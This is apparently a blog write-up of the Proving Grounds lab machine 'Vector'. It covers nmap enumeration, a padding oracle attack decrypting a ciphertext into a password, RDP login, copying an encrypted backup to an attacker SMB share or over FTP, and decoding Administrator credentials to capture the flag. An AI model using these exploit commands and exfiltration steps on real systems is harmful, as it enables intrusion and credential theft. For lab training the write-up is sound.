Home Vector - PG
Post
Cancel

Vector - PG

Posted 2022-01-22 3 min read

Recon & Enumeration

1
2

# autorecon
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN full_tcp_nmap.txt 192.168.157.119

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

PORT     STATE SERVICE       REASON          VERSION
21/tcp   open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
2290/tcp open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=vector
| Issuer: commonName=vector
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-09-20T18:21:33
| Not valid after:  2022-03-22T18:21:33
| MD5:   9f9a 1f6b 3f7b 3178 b7d0 1aa5 9df4 25ad
| SHA-1: 4254 3770 1d9d dcd2 0886 be7f b28d b6b6 2a3f 8c6a
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIQeYu1RKPBi5ZGlb45mRn2PzANBgkqhkiG9w0BAQsFADAR
  <--SNIP-->
| Q4Q5C6rGKL/lLtDEeden9m3tL+GXfLphsxqo6xmaWhW3yZ8oKhi7stxEHWvxeWU1
| /yO+PQ==
|_-----END CERTIFICATE-----
|_ssl-date: 2022-01-21T19:05:31+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: VECTOR
|   NetBIOS_Domain_Name: VECTOR
|   NetBIOS_Computer_Name: VECTOR
|   DNS_Domain_Name: vector
|   DNS_Computer_Name: vector
|   Product_Version: 10.0.17763
|_  System_Time: 2022-01-21T19:04:51+00:00
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
  • Visit http://192.168.157.119:2290/default.aspx
  • Check comments:
1
2
3

AES-256-CBC-PKCS7 ciphertext: 4358b2f77165b5130e323f067ab6c8a92312420765204ce350b1fbb826c59488
		
Victor's TODO: Need to add authentication eventually..

Exploitation

  • Google: AES-256-CBC-PKCS7 ciphertext decrypt
  • Google: AES-256-CBC-PKCS7 ciphertext exploit
  • Padding Oracle Attack

Padding Oracle Attack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

python3 exploit.py -c 4358b2f77165b5130e323f067ab6c8a92312420765204ce350b1fbb826c59488 -l 16 --host 192.168.157.119:2290 -u '/default.aspx?c=' --error '<span id="MyLabel">0</span>'

[+] Search value block :  1
[+] Found  1 bytes : 04
[+] Found  2 bytes : 0404
[+] Found  3 bytes : 040404
[+] Found  4 bytes : 04040404
[+] Found  5 bytes : 3704040404
[+] Found  6 bytes : 743704040404
[+] Found  7 bytes : 61743704040404
[+] Found  8 bytes : 5661743704040404
[+] Found  9 bytes : 655661743704040404
[+] Found 10 bytes : 6f655661743704040404
[+] Found 11 bytes : 6c6f655661743704040404
[+] Found 12 bytes : 416c6f655661743704040404
[+] Found 13 bytes : 6d416c6f655661743704040404
[+] Found 14 bytes : 726d416c6f655661743704040404
[+] Found 15 bytes : 6f726d416c6f655661743704040404
[+] Found 16 bytes : 576f726d416c6f655661743704040404

[+] Decrypted value (HEX): 576F726D416C6F655661743704040404
[+] Decrypted value (ASCII): WormAloeVat7
  • WormAloeVat7
  • We also have a username from TODO note in the comments: Victor
  • Victor:WormAloeVat7
  • RDP using these credentials

Privilege Escalation

  • There is a backup.rar encrypted file in Users/victor/Downloads
  • Start SMBServer and copy the file over to Kali
  • copy ./backup.rar \\192.168.49.157\share\
  • For whatever reason that didn’t work. But there was FTP running on the box and I was able to log in using the same credentials we got. So I copied that file to C:\FTPRoot and logged in via FTP on Kali to get the file
  • ftp 192.168.157.119 21 => victor:WormAloeVat7
  • binary to set binary mode
  • get backup.rar to download

Extract the RAR File

1
2
3
4

unrar e backup.rar
Enter password for backup.rar: WormAloeVat7
Extracting from backup.rar
Extracting  backup.txt  OK
  • cat backup.txt
1

QWRtaW5pc3RyYXRvcjpFdmVyeXdheUxhYmVsV3JhcDM3NQ==
  • cat backup.txt | base64 -d
  • Administrator:EverywayLabelWrap375
  • Log out and RDP again into the machine, this time as the Administrator
1
2
3
4
5
6
7

C:\Users\Administrator\Desktop>whoami && hostname && ipconfig | findstr IPv4 && type proof.txt
vector\administrator
vector
   IPv4 Address. . . . . . . . . . . : 192.168.157.119
668ac83fd9c03503c34f00b0e4da3a

C:\Users\Administrator\Desktop>
Writeups, Proving Grounds
PG Padding Oracle Attack
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents